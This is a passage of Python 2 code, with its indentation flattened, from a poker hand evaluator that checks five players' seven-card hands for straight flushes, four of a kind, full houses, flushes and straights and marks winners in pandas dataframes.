4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a3 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a3 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a3 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P4 Evaluation
# With Ace Low
list[0] = [df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 0]]
list[1] = [df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 2]]
list[2] = [df4.iloc[i * 4 + k - 1, 5], df4.iloc[i * 4 + k - 1, 4]]
list[3] = [df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 6]]
list[4] = [df4.iloc[i * 4 + k - 1, 9], df4.iloc[i * 4 + k - 1, 8]]
list[5] = [df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 10]]
list[6] = [df4.iloc[i * 4 + k - 1, 13], df4.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a4 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a4 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a4 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 0]]
list[1] = [df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 2]]
list[2] = [df4.iloc[i * 4 + k - 1, 5], df4.iloc[i * 4 + k - 1, 4]]
list[3] = [df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 6]]
list[4] = [df4.iloc[i * 4 + k - 1, 9], df4.iloc[i * 4 + k - 1, 8]]
list[5] = [df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 10]]
list[6] = [df4.iloc[i * 4 + k - 1, 13], df4.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a4 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a4 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a4 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P5 Evaluation
# With Ace Low
list[0] = [df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 0]]
list[1] = [df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 2]]
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list[6] = [df5.iloc[i * 4 + k - 1, 13], df5.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a5 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a5 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a5 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 0]]
list[1] = [df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 2]]
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list[6] = [df5.iloc[i * 4 + k - 1, 13], df5.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a5 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a5 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a5 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# Straight Flush Evaluation in community cards
master = 0
# With Ace Low
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list[6] = [df5.iloc[i * 4 + k - 1, 13], df5.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
master = 1
# With Ace High
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list[6] = [df5.iloc[i * 4 + k - 1, 13], df5.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
master = 1
# Check for Straight flush
if master == 1:
print "Royal Flush in community cards"
elif (SF > 0):
print "Straight Flush"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for four of a kind
FK = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a1 = m
break
if count == 4:
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a2 = m
break
if count == 4:
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a3 = m
break
if count == 4:
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a4 = m
break
if count == 4:
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a5 = m
break
if count == 4:
break
# Checking for Four of a kind
if (FK > 0):
print "Four of a kind"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for full house
FH = 0
a1i = 0
a1ii = 0
a2i = 0
a2ii = 0
a3i = 0
a3ii = 0
a4i = 0
a4ii = 0
a5i = 0
a5ii = 0
next = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a1i = m
a1ii = n
break
if count == 2:
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a2i = m
a2ii = n
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a3i = m
a3ii = n
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a4i = m
a4ii = n
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a5i = m
a5ii = n
break
# Evaluating for Full House
if (FH > 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
c = 0
if a1i == b:
c = c + 1
elif a2i == b:
c = c + 1
elif a3i == b:
c = c + 1
elif a4i == b:
c = c + 1
elif a5i == b:
c = c + 1
if c > 1:
b = max(a1ii, a2ii, a3ii, a4ii, a5ii)
if a1ii == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2ii == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3ii == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4ii == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5ii == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
elif (FH == 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Evaluate for Flush
F = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# Evaluate P1
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
list[5] = df1.iloc[i * 4 + k - 1, 10]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a1 = m
break
# Evaluate P2
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
list[5] = df2.iloc[i * 4 + k - 1, 10]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a2 = m
break
# Evaluate P3
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
list[5] = df3.iloc[i * 4 + k - 1, 10]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a3 = m
break
# Evaluate P4
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
list[5] = df4.iloc[i * 4 + k - 1, 10]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a4 = m
break
# Evaluate P5
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
list[5] = df5.iloc[i * 4 + k - 1, 10]
list[6] = df5.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a5 = m
break
if F > 0:
print "Flush"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for Straight
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
# With Ace Low
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in range(0, 7):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == list[5]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == list[6]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == list[
5]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P2 Evaluation
# With Ace Low
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in range(0, 7):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P3 Evaluation
# With Ace Low
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in range(0, 7):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P4 Evaluation
# With Ace Low
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in range(0, 7):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
